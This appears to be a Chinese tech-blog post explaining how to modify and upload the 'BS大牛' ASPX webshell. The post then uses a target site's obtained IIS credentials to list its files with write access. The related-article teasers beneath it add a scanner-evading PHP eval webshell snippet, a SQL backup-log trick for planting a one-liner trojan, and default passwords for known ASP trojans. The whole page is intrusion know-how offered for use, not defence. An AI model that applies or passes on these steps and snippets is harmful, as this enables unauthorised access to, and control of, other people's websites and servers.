ASPX大马得到IIS账户密码跨站

最新推荐文章于 2025-06-07 12:10:17 发布
原创 最新推荐文章于 2025-06-07 12:10:17 发布 · 1.7k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#iis #shell #服务器 #asp #bt

本文介绍如何通过修改BS大牛Shell的配置项并上传到支持ASP的服务器来实现远程登录,包括设置允许其他用户访问参数及登录过程。
在要使用BS大牛的shell之前我们还需要改动喜爱BS大牛的shell内容。

      搜索bs大牛shell中内容”Const bOtherUser=False“,然后修改成”Const bOtherUser=True“,保存,上传到服务器任意网站目录下,当然还是要支持asp的了,然后访问,然后出现下图所示内容。


 这里直接点击OK,然后稍等下一下就会弹出登陆框了,如下图所示:


  然后我们在这里输入刚才得到的目标站的IIS账号和密码,然后登陆,成功了的话就会进入shell的登录框了。


      这里如数webshell的密码进入后直接拿目标站的路径跳转,然后就会发现目标站的目录和文件全部列出来了!不BT的话是有写入权限的!!OK.完事

hackmap-[windows权限提升(windows提权思路)]
m0_43405474的博客
04-09 5190
hackmap-[windows权限提升{windows提权思路}]1.前言1.1.提权分类水平权限提升(越权)垂直权限提升1.2 windows提权概述2.windows基于WebShell提权2.1 前言2.1.1 asp大马 vs aspx大马(windows2003+IIS)1)asp大马2)aspx大马3)小结2.1.2 基于系统漏洞提权1)信息收集2)漏洞补丁对照表3)提权过程3.实战3.1针对2003 KB952004 提权实验step1:利用aspx大马进行信息搜集——补丁安装情况step2
经典的 Aspx一句话木马使用
tuo9999的专栏
07-12 1865
1. 相当于 ASP 一句话木马 : 顺序代码 alter databas pub set RECOVERY FULL-- creat tabl pubs.dbo.cmd a imag backup log pub to disk = 'c:/TM' with init fals ;ow.Writ Request.Params["l"] ;ow.Clos %> ' insert into pubs.dbo.cmd a valu '<%System.IO.StreamWrit
aspx大马
09-14
aspdama
Aspx目标网站入侵之旁注加跨站入侵
kendyhj9999的专栏
06-14 2500
指定目标网站入侵之旁注加跨站入侵   2010-09-17 14:06:49|  分类: 默认分类 |  标签: |举报 |字号大中小 订阅 今天中午群里的幸福又发站出来了,说是网站挺好看的,呵呵。这不用说,铁定的这小子又看上人家源码和模板了。一般他发的网站我都会看的。呵呵,之前也有帮他拿过几个,那小子什么黑客技术基本不懂。拿别人网站程序做网站到还挺能耐滴。    
(48.1)【WAF绕过-权限控制】webshell、小马、权限脚本、权限工具
05-19 1461
【权限控制】脚本、木马、工具
ASPX一句话木马--终极版&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个版本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
asp.net 大马汉化版
05-08
asp.net 大马汉化版 ...............
aspx超强木马查杀与防范(web网马)
10-26
下面代码是一个aspx超强木马,功能很多,大家在服务器上见到一定要小心
shell 免杀aspx_发个免杀修改的aspx提权马
weixin_35559202的博客
12-31 479
htmlPUBLIC"-//W3C//DTDXHTML1.0Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">protectedvoidPage_load(objectsender,EventArgse){stringok=Request.QueryString["s...
aspx
yanyunfei123的专栏
08-30 1209
Dim PASSWORD as string = "mima"---------------------------------------------------------------------------------------------------------------------------------              Root@Shell by Silentz 
shell 免杀aspx_对于asp免杀webshell的一些总结
weixin_31235909的博客
12-31 770
0x00 前言现在asp不多但是还是有,还是写一篇文章来简单的介绍下asp的免杀吧,相对于php我们的asp还是不够灵活,其中一些思路参考于LandGrey的文章偷偷介绍下公众号:404安全0x01 目录数组函数加密注释符类字符串操作0x02 了解asp一句话ASP解释器还有:VBScriptASP的注释符号 : ' 、 REM 当然如果你使用vbscript 注释还有 和//ASP的执行函数 :...
Asp大马介绍
Jim的博客
09-15 4726
最近草泥马这款最新版的Asp大马很热门,主流大马的提权功能,信息收集功能,以及木马隐藏功能都十分不错。 "星外主机提权"、“华众主机提权”、“N点主机提权”、“新网主机提权”
aspx包含文件过狗方法
如鹿渴慕泉水的专栏
11-05 3274
把同一个目录建一个xxxxaspx.aqg里面放代码就可以,可以是一个图片
各大Asp木马的万能密码
fengling132的专栏
03-19 5657
各大Asp木马的万能密码 首先十三webshell9.0VIP版和漫步云端修改版,默认密码?x=x或?web=admin  还有易思免杀ASP大马,密码?PageName=PageName  黑羽黑客基地小马默认密码donqee或kaifeng  朽木奥运版最新ASP木马(黑色版本),朽木奥运版最新ASP木马(绿色版本)  黑客动画吧奥运版最新ASP木马(黑色版本),黑客动画
一个过D盾的php小马
https://www.cnblogs.com/zpchcbd/
04-29 1727
这里给大家分享一个自己写的过D盾的马 <?php class ade { static $name = 'ceshi'; function __construct($name) { self::$name = $name; @eval(Null.self/**/::$name.Null); } } new ade($_POST[1]); 这里主要注意的一点的是$name...
webshell大马asp,jsp,php)
weixin_56537388的博客
08-29 2568
可以在Windows Server虚拟机中搭建,具体的搭建步骤网上很多教程,这里不再赘述,这里主要演示asp大马的效果:上传asp大马,将大马放到IIS服务器的根目录。注意,要复现ASPX文件的大马,需要.NET环境,所以在搭建IIS服务器的时候,我们需要勾上上面的那些,使用大马AspxSpy2014Final.aspx。需要搭建Tomcat环境,才能执行jsp文件。Tomcat环境配置教程网上有,也可以参考我这篇文章:Tomcat配置。登录之后,就可以看到功能界面了,这里演示cmd操作。
aspx汗血宝马-免杀ASPX大马
最新发布
seoppg的博客
06-07 603
我想通过这个图片你已经看到了这个木马的强大之处了,服务器上的所有资源一览无余,各种操作,各种骚……你懂得!关于ASP.NET木马ASPXSPY的初步处理研究前段时间服务器中了木马了,经过排查,截获了ASPXSPY木马。该木马是用ASP.NET写的,为了知己知彼,就将木马拷到本地运行研究,发现功能真的很强大,自认为服务器设置有一定经验的我在默认情况下对此木马都大门敞开。我的基本设置:每个Web设置有专门用户,而每个用户都只是Guest组帐号,仅对Web目录具有访问权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值